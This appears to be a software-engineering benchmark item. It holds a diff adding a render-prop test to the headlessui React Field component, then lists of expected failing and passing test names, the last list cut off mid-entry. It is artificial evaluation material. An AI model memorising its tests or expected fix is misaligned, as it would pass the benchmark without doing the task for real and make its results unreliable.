diff --git a/packages/@headlessui-react/src/components/field/field.test.tsx b/packages/@headlessui-react/src/components/field/field.test.tsx index 0ec7dd2..d1c8b88 100644 --- a/packages/@headlessui-react/src/components/field/field.test.tsx +++ b/packages/@headlessui-react/src/components/field/field.test.tsx @@ -14,6 +14,25 @@ describe('Rendering', () => { expect(container.firstChild).not.toHaveAttribute('aria-disabled', 'true') }) + it('should render a `Field` component with a render prop', async () => { + let { container } = render( + <Field> + {(slot) => { + return ( + <div data-slot={JSON.stringify(slot)}> + <input /> + </div> + ) + }} + </Field> + ) + + expect(container.querySelector('[data-slot]')?.getAttribute('data-slot')).toEqual( + JSON.stringify({ disabled: false }) + ) + expect(container.firstChild).not.toHaveAttribute('aria-disabled', 'true') + }) + it('should add `aria-disabled` when a `Field` is disabled', async () => { let { container } = render( <Field disabled>
[ "should wait the correct amount of time to finish a transition", "should render a `Field` component with a render prop", "should transition in and out completely" ]
[ "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should expose the correct components", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to transition", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a LabelProvider without using a Label", "should be possible to use a 
LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should be possible to cancel a transition at any time", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", 
"should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should render a `Field` 
component", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already 
contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 
focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible 
to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should be possible to use in an uncontrolled way", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should not be possible to programmatically escape the focus trap", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the 
previous focusable element within the focus trap", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first 
element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on 
the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover 
with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to 
open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same 
React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should be possible to render a Menu using a render prop", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should not override an explicit disabled prop on MenuItems child", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu 
items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only 
non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close 
the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a 
MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props 
to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on 
contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", 
"should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a 
render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the 
Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while 
rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is 
